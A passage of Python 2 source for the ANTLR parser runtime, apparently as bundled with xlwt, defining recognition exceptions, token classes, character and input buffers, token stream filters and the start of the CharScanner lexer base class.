'minor' : '7',
'micro' : '5',
'patch' : '' ,
'version': '2.7.5'
}
return r
## </version>
def error(fmt,*args):
if fmt:
print "error: ", fmt % tuple(args)
## note: unlike a conditional expression, both _then and _else have
## already been evaluated by the time ifelse() is called.
def ifelse(cond,_then,_else):
if cond :
r = _then
else:
r = _else
return r
def is_string_type(x):
# return (isinstance(x,str) or isinstance(x,unicode))
# Simplify; xlwt doesn't support Python < 2.3
return isinstance(x, basestring)
def assert_string_type(x):
assert is_string_type(x)
pass
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ANTLR Exceptions ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class ANTLRException(Exception):
def __init__(self, *args):
Exception.__init__(self, *args)
class RecognitionException(ANTLRException):
def __init__(self, *args):
ANTLRException.__init__(self, *args)
self.fileName = None
self.line = -1
self.column = -1
if len(args) >= 2:
self.fileName = args[1]
if len(args) >= 3:
self.line = args[2]
if len(args) >= 4:
self.column = args[3]
def __str__(self):
buf = ['']
if self.fileName:
buf.append(self.fileName + ":")
if self.line != -1:
if not self.fileName:
buf.append("line ")
buf.append(str(self.line))
if self.column != -1:
buf.append(":" + str(self.column))
buf.append(":")
buf.append(" ")
return str('').join(buf)
__repr__ = __str__
class NoViableAltException(RecognitionException):
def __init__(self, *args):
RecognitionException.__init__(self, *args)
self.token = None
self.node = None
if isinstance(args[0],AST):
self.node = args[0]
elif isinstance(args[0],Token):
self.token = args[0]
else:
raise TypeError("NoViableAltException requires Token or AST argument")
def __str__(self):
if self.token:
line = self.token.getLine()
col = self.token.getColumn()
text = self.token.getText()
return "unexpected symbol at line %s (column %s): \"%s\"" % (line,col,text)
if self.node == ASTNULL:
return "unexpected end of subtree"
assert self.node
### hackish, we assume that an AST contains method getText
return "unexpected node: %s" % (self.node.getText())
__repr__ = __str__
class NoViableAltForCharException(RecognitionException):
def __init__(self, *args):
self.foundChar = None
if len(args) == 2:
self.foundChar = args[0]
scanner = args[1]
RecognitionException.__init__(self, "NoViableAlt",
scanner.getFilename(),
scanner.getLine(),
scanner.getColumn())
elif len(args) == 4:
self.foundChar = args[0]
fileName = args[1]
line = args[2]
column = args[3]
RecognitionException.__init__(self, "NoViableAlt",
fileName, line, column)
else:
RecognitionException.__init__(self, "NoViableAlt",
'', -1, -1)
def __str__(self):
mesg = "unexpected char: "
if self.foundChar >= ' ' and self.foundChar <= '~':
mesg += "'" + self.foundChar + "'"
elif self.foundChar:
mesg += "0x" + hex(ord(self.foundChar)).upper()[2:]
else:
mesg += "<None>"
return mesg
__repr__ = __str__
class SemanticException(RecognitionException):
def __init__(self, *args):
RecognitionException.__init__(self, *args)
class MismatchedCharException(RecognitionException):
NONE = 0
CHAR = 1
NOT_CHAR = 2
RANGE = 3
NOT_RANGE = 4
SET = 5
NOT_SET = 6
def __init__(self, *args):
self.args = args
if len(args) == 5:
# Expected range / not range
if args[3]:
self.mismatchType = MismatchedCharException.NOT_RANGE
else:
self.mismatchType = MismatchedCharException.RANGE
self.foundChar = args[0]
self.expecting = args[1]
self.upper = args[2]
self.scanner = args[4]
RecognitionException.__init__(self, "Mismatched char range",
self.scanner.getFilename(),
self.scanner.getLine(),
self.scanner.getColumn())
elif len(args) == 4 and is_string_type(args[1]):
# Expected char / not char
if args[2]:
self.mismatchType = MismatchedCharException.NOT_CHAR
else:
self.mismatchType = MismatchedCharException.CHAR
self.foundChar = args[0]
self.expecting = args[1]
self.scanner = args[3]
RecognitionException.__init__(self, "Mismatched char",
self.scanner.getFilename(),
self.scanner.getLine(),
self.scanner.getColumn())
elif len(args) == 4 and isinstance(args[1], BitSet):
# Expected BitSet / not BitSet
if args[2]:
self.mismatchType = MismatchedCharException.NOT_SET
else:
self.mismatchType = MismatchedCharException.SET
self.foundChar = args[0]
self.set = args[1]
self.scanner = args[3]
RecognitionException.__init__(self, "Mismatched char set",
self.scanner.getFilename(),
self.scanner.getLine(),
self.scanner.getColumn())
else:
self.mismatchType = MismatchedCharException.NONE
RecognitionException.__init__(self, "Mismatched char")
## Append a char to the msg buffer. If special,
# then show escaped version
#
def appendCharName(self, sb, c):
if not c or c == 65535:
# 65535 = (char) -1 = EOF
sb.append("'<EOF>'")
elif c == '\n':
sb.append("'\\n'")
elif c == '\r':
sb.append("'\\r'");
elif c == '\t':
sb.append("'\\t'")
else:
sb.append('\'' + c + '\'')
##
# Returns an error message with line number/column information
#
def __str__(self):
sb = ['']
sb.append(RecognitionException.__str__(self))
if self.mismatchType == MismatchedCharException.CHAR:
sb.append("expecting ")
self.appendCharName(sb, self.expecting)
sb.append(", found ")
self.appendCharName(sb, self.foundChar)
elif self.mismatchType == MismatchedCharException.NOT_CHAR:
sb.append("expecting anything but '")
self.appendCharName(sb, self.expecting)
sb.append("'; got it anyway")
elif self.mismatchType in [MismatchedCharException.RANGE, MismatchedCharException.NOT_RANGE]:
sb.append("expecting char ")
if self.mismatchType == MismatchedCharException.NOT_RANGE:
sb.append("NOT ")
sb.append("in range: ")
self.appendCharName(sb, self.expecting)
sb.append("..")
self.appendCharName(sb, self.upper)
sb.append(", found ")
self.appendCharName(sb, self.foundChar)
elif self.mismatchType in [MismatchedCharException.SET, MismatchedCharException.NOT_SET]:
sb.append("expecting ")
if self.mismatchType == MismatchedCharException.NOT_SET:
sb.append("NOT ")
sb.append("one of (")
for i in range(len(self.set)):
self.appendCharName(sb, self.set[i])
sb.append("), found ")
self.appendCharName(sb, self.foundChar)
return str().join(sb).strip()
__repr__ = __str__
class MismatchedTokenException(RecognitionException):
NONE = 0
TOKEN = 1
NOT_TOKEN = 2
RANGE = 3
NOT_RANGE = 4
SET = 5
NOT_SET = 6
def __init__(self, *args):
self.args = args
self.tokenNames = []
self.token = None
self.tokenText = ''
self.node = None
self.fileName = None
if len(args) == 6:
# Expected range / not range: (tokenNames, token, lower,
# upper, matchNot, fileName), mirroring the Java constructor.
if args[4]:
self.mismatchType = MismatchedTokenException.NOT_RANGE
else:
self.mismatchType = MismatchedTokenException.RANGE
self.tokenNames = args[0]
self.expecting = args[2]
self.upper = args[3]
self.fileName = args[5]
elif len(args) in (4, 5) and isinstance(args[2], int):
# Expected token / not token; the optional 5th argument
# is the file name (as passed by Parser._match_int).
if args[3]:
self.mismatchType = MismatchedTokenException.NOT_TOKEN
else:
self.mismatchType = MismatchedTokenException.TOKEN
self.tokenNames = args[0]
self.expecting = args[2]
if len(args) == 5:
self.fileName = args[4]
elif len(args) in (4, 5) and isinstance(args[2], BitSet):
# Expected BitSet / not BitSet
if args[3]:
self.mismatchType = MismatchedTokenException.NOT_SET
else:
self.mismatchType = MismatchedTokenException.SET
self.tokenNames = args[0]
self.set = args[2]
if len(args) == 5:
self.fileName = args[4]
else:
self.mismatchType = MismatchedTokenException.NONE
RecognitionException.__init__(self, "Mismatched Token: expecting any AST node", "<AST>", -1, -1)
if len(args) >= 2:
if isinstance(args[1],Token):
self.token = args[1]
self.tokenText = self.token.getText()
RecognitionException.__init__(self, "Mismatched Token",
self.fileName,
self.token.getLine(),
self.token.getColumn())
elif isinstance(args[1],AST):
self.node = args[1]
self.tokenText = str(self.node)
RecognitionException.__init__(self, "Mismatched Token",
"<AST>",
self.node.getLine(),
self.node.getColumn())
else:
self.tokenText = "<empty tree>"
RecognitionException.__init__(self, "Mismatched Token",
"<AST>", -1, -1)
def appendTokenName(self, sb, tokenType):
if tokenType == INVALID_TYPE:
sb.append("<Set of tokens>")
elif tokenType < 0 or tokenType >= len(self.tokenNames):
sb.append("<" + str(tokenType) + ">")
else:
sb.append(self.tokenNames[tokenType])
##
# Returns an error message with line number/column information
#
def __str__(self):
sb = ['']
sb.append(RecognitionException.__str__(self))
if self.mismatchType == MismatchedTokenException.TOKEN:
sb.append("expecting ")
self.appendTokenName(sb, self.expecting)
sb.append(", found " + self.tokenText)
elif self.mismatchType == MismatchedTokenException.NOT_TOKEN:
sb.append("expecting anything but '")
self.appendTokenName(sb, self.expecting)
sb.append("'; got it anyway")
elif self.mismatchType in [MismatchedTokenException.RANGE, MismatchedTokenException.NOT_RANGE]:
sb.append("expecting token ")
if self.mismatchType == MismatchedTokenException.NOT_RANGE:
sb.append("NOT ")
sb.append("in range: ")
self.appendTokenName(sb, self.expecting)
sb.append("..")
self.appendTokenName(sb, self.upper)
sb.append(", found " + self.tokenText)
elif self.mismatchType in [MismatchedTokenException.SET, MismatchedTokenException.NOT_SET]:
sb.append("expecting ")
if self.mismatchType == MismatchedTokenException.NOT_SET:
sb.append("NOT ")
sb.append("one of (")
for i in range(len(self.set)):
self.appendTokenName(sb, self.set[i])
sb.append("), found " + self.tokenText)
return str().join(sb).strip()
__repr__ = __str__
class TokenStreamException(ANTLRException):
def __init__(self, *args):
ANTLRException.__init__(self, *args)
# Wraps an Exception in a TokenStreamException
class TokenStreamIOException(TokenStreamException):
def __init__(self, *args):
if args and isinstance(args[0], Exception):
io = args[0]
TokenStreamException.__init__(self, str(io))
self.io = io
else:
TokenStreamException.__init__(self, *args)
self.io = self
# Wraps a RecognitionException in a TokenStreamException
class TokenStreamRecognitionException(TokenStreamException):
def __init__(self, *args):
if args and isinstance(args[0], RecognitionException):
recog = args[0]
TokenStreamException.__init__(self, str(recog))
self.recog = recog
else:
raise TypeError("TokenStreamRecognitionException requires RecognitionException argument")
def __str__(self):
return str(self.recog)
__repr__ = __str__
class TokenStreamRetryException(TokenStreamException):
def __init__(self, *args):
TokenStreamException.__init__(self, *args)
class CharStreamException(ANTLRException):
def __init__(self, *args):
ANTLRException.__init__(self, *args)
# Wraps an Exception in a CharStreamException
class CharStreamIOException(CharStreamException):
def __init__(self, *args):
if args and isinstance(args[0], Exception):
io = args[0]
CharStreamException.__init__(self, str(io))
self.io = io
else:
CharStreamException.__init__(self, *args)
self.io = self
class TryAgain(Exception):
pass
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### Token ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class Token(object):
SKIP = -1
INVALID_TYPE = 0
EOF_TYPE = 1
EOF = 1
NULL_TREE_LOOKAHEAD = 3
MIN_USER_TYPE = 4
def __init__(self,**argv):
self.type = argv.get('type', INVALID_TYPE)
self.text = argv.get('text', "<no text>")
def isEOF(self):
return (self.type == EOF_TYPE)
def getColumn(self):
return 0
def getLine(self):
return 0
def getFilename(self):
return None
def setFilename(self,name):
return self
def getText(self):
return "<no text>"
def setText(self,text):
if is_string_type(text):
pass
else:
raise TypeError("Token.setText requires string argument")
return self
def setColumn(self,column):
return self
def setLine(self,line):
return self
def getType(self):
return self.type
def setType(self,type):
if isinstance(type,int):
self.type = type
else:
raise TypeError("Token.setType requires integer argument")
return self
def toString(self):
## not optimal
type_ = self.type
if type_ == 3:
tval = 'NULL_TREE_LOOKAHEAD'
elif type_ == 1:
tval = 'EOF_TYPE'
elif type_ == 0:
tval = 'INVALID_TYPE'
elif type_ == -1:
tval = 'SKIP'
else:
tval = type_
return '["%s",<%s>]' % (self.getText(),tval)
__str__ = toString
__repr__ = toString
### static attribute ..
Token.badToken = Token( type=INVALID_TYPE, text="<no text>")
if __name__ == "__main__":
print "testing .."
T = Token.badToken
print T
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CommonToken ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CommonToken(Token):
def __init__(self,**argv):
Token.__init__(self,**argv)
self.line = argv.get('line', 0)
self.col = argv.get('col', 0)
def getLine(self):
return self.line
def getText(self):
return self.text
def getColumn(self):
return self.col
def setLine(self,line):
self.line = line
return self
def setText(self,text):
self.text = text
return self
def setColumn(self,col):
self.col = col
return self
def toString(self):
## not optimal
type_ = self.type
if type_ == 3:
tval = 'NULL_TREE_LOOKAHEAD'
elif type_ == 1:
tval = 'EOF_TYPE'
elif type_ == 0:
tval = 'INVALID_TYPE'
elif type_ == -1:
tval = 'SKIP'
else:
tval = type_
d = {
'text' : self.text,
'type' : tval,
'line' : self.line,
'colm' : self.col
}
fmt = '["%(text)s",<%(type)s>,line=%(line)s,col=%(colm)s]'
return fmt % d
__str__ = toString
__repr__ = toString
if __name__ == '__main__' :
T = CommonToken()
print T
T = CommonToken(col=15,line=1,text="some text", type=5)
print T
T = CommonToken()
T.setLine(1).setColumn(15).setText("some text").setType(5)
print T
print T.getLine()
print T.getColumn()
print T.getText()
print T.getType()
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CommonHiddenStreamToken ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CommonHiddenStreamToken(CommonToken):
def __init__(self,*args):
CommonToken.__init__(self,*args)
self.hiddenBefore = None
self.hiddenAfter = None
def getHiddenAfter(self):
return self.hiddenAfter
def getHiddenBefore(self):
return self.hiddenBefore
def setHiddenAfter(self,t):
self.hiddenAfter = t
def setHiddenBefore(self, t):
self.hiddenBefore = t
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### Queue ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
## Shall be a circular buffer on tokens ..
class Queue(object):
def __init__(self):
self.buffer = [] # empty list
def append(self,item):
self.buffer.append(item)
def elementAt(self,index):
return self.buffer[index]
def reset(self):
self.buffer = []
def removeFirst(self):
self.buffer.pop(0)
def length(self):
return len(self.buffer)
def __str__(self):
return str(self.buffer)
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### InputBuffer ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class InputBuffer(object):
def __init__(self):
self.nMarkers = 0
self.markerOffset = 0
self.numToConsume = 0
self.queue = Queue()
def __str__(self):
return "(%s,%s,%s,%s)" % (
self.nMarkers,
self.markerOffset,
self.numToConsume,
self.queue)
def __repr__(self):
return str(self)
def commit(self):
self.nMarkers -= 1
def consume(self) :
self.numToConsume += 1
## probably better to return a list of items
## because of unicode. Or return a unicode
## string ..
def getLAChars(self) :
i = self.markerOffset
n = self.queue.length()
s = ''
while i < n:
s += self.queue.elementAt(i)
i += 1
return s
## probably better to return a list of items
## because of unicode chars
def getMarkedChars(self) :
s = ''
i = 0
n = self.markerOffset
while i < n:
s += self.queue.elementAt(i)
i += 1
return s
def isMarked(self) :
return self.nMarkers != 0
def fill(self,k):
### abstract method
raise NotImplementedError()
def LA(self,k) :
self.fill(k)
return self.queue.elementAt(self.markerOffset + k - 1)
def mark(self) :
self.syncConsume()
self.nMarkers += 1
return self.markerOffset
def rewind(self,mark) :
self.syncConsume()
self.markerOffset = mark
self.nMarkers -= 1
def reset(self) :
self.nMarkers = 0
self.markerOffset = 0
self.numToConsume = 0
self.queue.reset()
def syncConsume(self) :
while self.numToConsume > 0:
if self.nMarkers > 0:
# guess mode -- leave leading characters and bump offset.
self.markerOffset += 1
else:
# normal mode -- remove first character
self.queue.removeFirst()
self.numToConsume -= 1
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CharBuffer ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CharBuffer(InputBuffer):
def __init__(self,reader):
##assert isinstance(reader,file)
super(CharBuffer,self).__init__()
## a reader is supposed to be anything that has
## a method 'read(int)'.
self.input = reader
def __str__(self):
base = super(CharBuffer,self).__str__()
return "CharBuffer{%s,%s" % (base,str(input))
def fill(self,amount):
try:
self.syncConsume()
while self.queue.length() < (amount + self.markerOffset) :
## retrieve just one char - what happens at the end
## of input?
c = self.input.read(1)
### python's behaviour is to return the empty string on
### EOF, ie. no exception whatsoever is thrown. An empty
### python string has the nice feature that it is of
### type 'str' and "not ''" would return true. Contrary,
### one can't do this: '' in 'abc'. This should return
### false, but all we get is then a TypeError as an
### empty string is not a character.
### Let's assure then that we have either seen a
### character or an empty string (EOF).
assert len(c) == 0 or len(c) == 1
### And it shall be of type string (ASCII or UNICODE).
assert is_string_type(c)
### Just append EOF char to buffer. Note that buffer may
### contain then just more than one EOF char ..
### use unicode chars instead of ASCII ..
self.queue.append(c)
except Exception,e:
raise CharStreamIOException(e)
##except: # (mk) Cannot happen ...
##error ("unexpected exception caught ..")
##assert 0
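## Hypothetical usage sketch, not part of the ANTLR runtime: exercising
## CharBuffer's one-char lookahead / mark / rewind protocol over an
## in-memory stream.
if __name__ == '__main__':
    from StringIO import StringIO
    cb = CharBuffer(StringIO("abc"))
    assert cb.LA(1) == 'a'   # 1-based lookahead; does not consume
    m = cb.mark()            # remember the current position
    cb.consume()
    cb.consume()
    assert cb.LA(1) == 'c'
    cb.rewind(m)             # roll back to the mark
    assert cb.LA(1) == 'a'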
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### LexerSharedInputState ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class LexerSharedInputState(object):
def __init__(self,ibuf):
assert isinstance(ibuf,InputBuffer)
self.input = ibuf
self.column = 1
self.line = 1
self.tokenStartColumn = 1
self.tokenStartLine = 1
self.guessing = 0
self.filename = None
def reset(self):
self.column = 1
self.line = 1
self.tokenStartColumn = 1
self.tokenStartLine = 1
self.guessing = 0
self.filename = None
self.input.reset()
def LA(self,k):
return self.input.LA(k)
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenStream ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenStream(object):
def nextToken(self):
pass
def __iter__(self):
return TokenStreamIterator(self)
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenStreamIterator ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenStreamIterator(object):
def __init__(self,inst):
if isinstance(inst,TokenStream):
self.inst = inst
return
raise TypeError("TokenStreamIterator requires TokenStream object")
def next(self):
assert self.inst
item = self.inst.nextToken()
if not item or item.isEOF():
raise StopIteration()
return item
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenStreamSelector ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenStreamSelector(TokenStream):
def __init__(self):
self._input = None
self._stmap = {}
self._stack = []
def addInputStream(self,stream,key):
self._stmap[key] = stream
def getCurrentStream(self):
return self._input
def getStream(self,sname):
try:
stream = self._stmap[sname]
except KeyError:
raise ValueError("TokenStream " + sname + " not found")
return stream
def nextToken(self):
while 1:
try:
return self._input.nextToken()
except TokenStreamRetryException,r:
### just retry "forever"
pass
def pop(self):
stream = self._stack.pop()
self.select(stream)
return stream
def push(self,arg):
self._stack.append(self._input)
self.select(arg)
def retry(self):
raise TokenStreamRetryException()
def select(self,arg):
if isinstance(arg,TokenStream):
self._input = arg
return
if is_string_type(arg):
self._input = self.getStream(arg)
return
raise TypeError("TokenStreamSelector.select requires " +
"TokenStream or string argument")
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenStreamBasicFilter ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenStreamBasicFilter(TokenStream):
def __init__(self,input):
self.input = input
self.discardMask = BitSet()
def discard(self,arg):
if isinstance(arg,int):
self.discardMask.add(arg)
return
if isinstance(arg,BitSet):
self.discardMask = arg
return
raise TypeError("TokenStreamBasicFilter.discard requires" +
"integer or BitSet argument")
def nextToken(self):
tok = self.input.nextToken()
while tok and self.discardMask.member(tok.getType()):
tok = self.input.nextToken()
return tok
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenStreamHiddenTokenFilter ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenStreamHiddenTokenFilter(TokenStreamBasicFilter):
def __init__(self,input):
TokenStreamBasicFilter.__init__(self,input)
self.hideMask = BitSet()
self.nextMonitoredToken = None
self.lastHiddenToken = None
self.firstHidden = None
def consume(self):
self.nextMonitoredToken = self.input.nextToken()
def consumeFirst(self):
self.consume()
p = None
while self.hideMask.member(self.LA(1).getType()) or \
self.discardMask.member(self.LA(1).getType()):
if self.hideMask.member(self.LA(1).getType()):
if not p:
p = self.LA(1)
else:
p.setHiddenAfter(self.LA(1))
self.LA(1).setHiddenBefore(p)
p = self.LA(1)
self.lastHiddenToken = p
if not self.firstHidden:
self.firstHidden = p
self.consume()
def getDiscardMask(self):
return self.discardMask
def getHiddenAfter(self,t):
return t.getHiddenAfter()
def getHiddenBefore(self,t):
return t.getHiddenBefore()
def getHideMask(self):
return self.hideMask
def getInitialHiddenToken(self):
return self.firstHidden
def hide(self,m):
if isinstance(m,int):
self.hideMask.add(m)
return
if isinstance(m, BitSet):
self.hideMask = m
return
def LA(self,i):
return self.nextMonitoredToken
def nextToken(self):
if not self.LA(1):
self.consumeFirst()
monitored = self.LA(1)
monitored.setHiddenBefore(self.lastHiddenToken)
self.lastHiddenToken = None
self.consume()
p = monitored
while self.hideMask.member(self.LA(1).getType()) or \
self.discardMask.member(self.LA(1).getType()):
if self.hideMask.member(self.LA(1).getType()):
p.setHiddenAfter(self.LA(1))
if p != monitored:
self.LA(1).setHiddenBefore(p)
p = self.lastHiddenToken = self.LA(1)
self.consume()
return monitored
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### StringBuffer ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class StringBuffer:
def __init__(self,string=None):
if string:
self.text = list(string)
else:
self.text = []
def setLength(self,sz):
if not sz :
self.text = []
return
assert sz>0
if sz >= self.length():
return
### truncate the buffer to 'sz' chars
self.text = self.text[0:sz]
def length(self):
return len(self.text)
def append(self,c):
self.text.append(c)
### return buffer as string. Arg 'a' is used as index
## into the buffer and 2nd argument shall be the length.
## If 2nd args is absent, we return chars till end of
## buffer starting with 'a'.
def getString(self,a=None,length=None):
if not a :
a = 0
assert a>=0
if a>= len(self.text) :
return ""
if not length:
## no second argument
L = self.text[a:]
else:
assert (a+length) <= len(self.text)
b = a + length
L = self.text[a:b]
s = ""
for x in L : s += x
return s
toString = getString ## alias
def __str__(self):
return str(self.text)
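## Hypothetical usage sketch, not part of the ANTLR runtime: the
## Java-style StringBuffer emulation over a list of chars.
if __name__ == '__main__':
    sb = StringBuffer("hello")
    sb.append('!')
    assert sb.getString() == "hello!"
    assert sb.getString(1, 3) == "ell"   # offset 1, length 3
    sb.setLength(5)                      # truncate
    assert sb.getString() == "hello"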
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### Reader ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
## When reading Japanese chars, it happens that a stream returns a
## 'char' of length 2. This looks like a bug in the appropriate
## codecs - but I'm rather unsure about this. Anyway, if this is
## the case, I'm going to split this string into a list of chars
## and put them on hold, ie. on a buffer. Next time when called
## we read from buffer until buffer is empty.
## wh: nov, 25th -> problem does not appear in Python 2.4.0.c1.
class Reader(object):
def __init__(self,stream):
self.cin = stream
self.buf = []
def read(self,num):
assert num==1
if len(self.buf):
return self.buf.pop()
## Read a char - this may return a string.
## Is this a bug in codecs/Python?
c = self.cin.read(1)
if not c or len(c)==1:
return c
L = list(c)
L.reverse()
for x in L:
self.buf.append(x)
## read one char ..
return self.read(1)
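## Hypothetical sketch, not part of the ANTLR runtime, of the situation
## described above: a stream whose read(1) yields two chars at once;
## Reader buffers the surplus and hands chars back one at a time.
if __name__ == '__main__':
    class _TwoCharStream(object):
        def __init__(self):
            self.done = False
        def read(self, n):
            if self.done:
                return ''
            self.done = True
            return 'ab'   # a misbehaving codec result
    r = Reader(_TwoCharStream())
    assert r.read(1) == 'a'
    assert r.read(1) == 'b'
    assert r.read(1) == ''   # EOF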
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CharScanner ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CharScanner(TokenStream):
## class members
NO_CHAR = 0
EOF_CHAR = '' ### EOF shall be the empty string.
def __init__(self, *argv, **kwargs):
super(CharScanner, self).__init__()
self.saveConsumedInput = True
self.tokenClass = None
self.caseSensitive = True
self.caseSensitiveLiterals = True
self.literals = None
self.tabsize = 8
self._returnToken = None
self.commitToPath = False
self.traceDepth = 0
self.text = StringBuffer()
self.hashString = hash(self)
self.setTokenObjectClass(CommonToken)
self.setInput(*argv)
def __iter__(self):
return CharScannerIterator(self)
def setInput(self,*argv):
## case 1:
## if there's no arg we default to read from
## standard input
if not argv:
import sys
self.setInput(sys.stdin)
return
## get 1st argument
arg1 = argv[0]
## case 2:
## if arg1 is a string, we assume it's a file name and
## open the file ourselves in binary read mode ("rb").
if is_string_type(arg1):
f = open(arg1,"rb")
self.setInput(f)
self.setFilename(arg1)
return
## case 3:
## if arg1 is a file we wrap it by a char buffer (
## some additional checks?? No, can't do this in
## general).
if isinstance(arg1,file):
self.setInput(CharBuffer(arg1))
return
## case 4:
## if arg1 is of type SharedLexerInputState we use
## argument as is.
if isinstance(arg1,LexerSharedInputState):
self.inputState = arg1
return
## case 5:
## check whether argument type is of type input
## buffer. If so create a SharedLexerInputState and
## go ahead.
if isinstance(arg1,InputBuffer):
self.setInput(LexerSharedInputState(arg1))
return
## case 6:
## check whether argument type has a method read(int)
## If so create CharBuffer ...
try:
if arg1.read:
rd = Reader(arg1)
cb = CharBuffer(rd)
ss = LexerSharedInputState(cb)
self.inputState = ss
return
except AttributeError:
pass
## case 7:
## raise wrong argument exception
raise TypeError(argv)
def setTabSize(self,size) :
self.tabsize = size
def getTabSize(self) :
return self.tabsize
def setCaseSensitive(self,t) :
self.caseSensitive = t
def setCommitToPath(self,commit) :
self.commitToPath = commit
def setFilename(self,f) :
self.inputState.filename = f
def setLine(self,line) :
self.inputState.line = line
def setText(self,s) :
self.resetText()
self.text.append(s)
def getCaseSensitive(self) :
return self.caseSensitive
def getCaseSensitiveLiterals(self) :
return self.caseSensitiveLiterals
def getColumn(self) :
return self.inputState.column
def setColumn(self,c) :
self.inputState.column = c
def getCommitToPath(self) :
return self.commitToPath
def getFilename(self) :
return self.inputState.filename
def getInputBuffer(self) :
return self.inputState.input
def getInputState(self) :
return self.inputState
def setInputState(self,state) :
assert isinstance(state,LexerSharedInputState)
self.inputState = state
def getLine(self) :
return self.inputState.line
def getText(self) :
return str(self.text)
def getTokenObject(self) :
return self._returnToken
def LA(self,i) :
c = self.inputState.input.LA(i)
if not self.caseSensitive:
### E0006
c = c.__class__.lower(c)
return c
def makeToken(self,type) :
try:
## dynamically load a class
assert self.tokenClass
tok = self.tokenClass()
tok.setType(type)
tok.setColumn(self.inputState.tokenStartColumn)
tok.setLine(self.inputState.tokenStartLine)
return tok
except:
self.panic("unable to create new token")
return Token.badToken
def mark(self) :
return self.inputState.input.mark()
def _match_bitset(self,b) :
if b.member(self.LA(1)):
self.consume()
else:
raise MismatchedCharException(self.LA(1), b, False, self)
def _match_string(self,s) :
for c in s:
if self.LA(1) == c:
self.consume()
else:
raise MismatchedCharException(self.LA(1), c, False, self)
def match(self,item):
if is_string_type(item):
return self._match_string(item)
else:
return self._match_bitset(item)
def matchNot(self,c) :
if self.LA(1) != c:
self.consume()
else:
raise MismatchedCharException(self.LA(1), c, True, self)
def matchRange(self,c1,c2) :
if self.LA(1) < c1 or self.LA(1) > c2 :
raise MismatchedCharException(self.LA(1), c1, c2, False, self)
else:
self.consume()
def newline(self) :
self.inputState.line += 1
self.inputState.column = 1
def tab(self) :
c = self.getColumn()
nc = ( ((c-1)/self.tabsize) + 1) * self.tabsize + 1
self.setColumn(nc)
def panic(self,s='') :
print "CharScanner: panic: " + s
sys.exit(1)
def reportError(self,s) :
if not self.getFilename():
print "error: " + str(s)
else:
print self.getFilename() + ": error: " + str(s)
def reportWarning(self,s) :
if not self.getFilename():
print "warning: " + str(s)
else:
print self.getFilename() + ": warning: " + str(s)
def resetText(self) :
self.text.setLength(0)
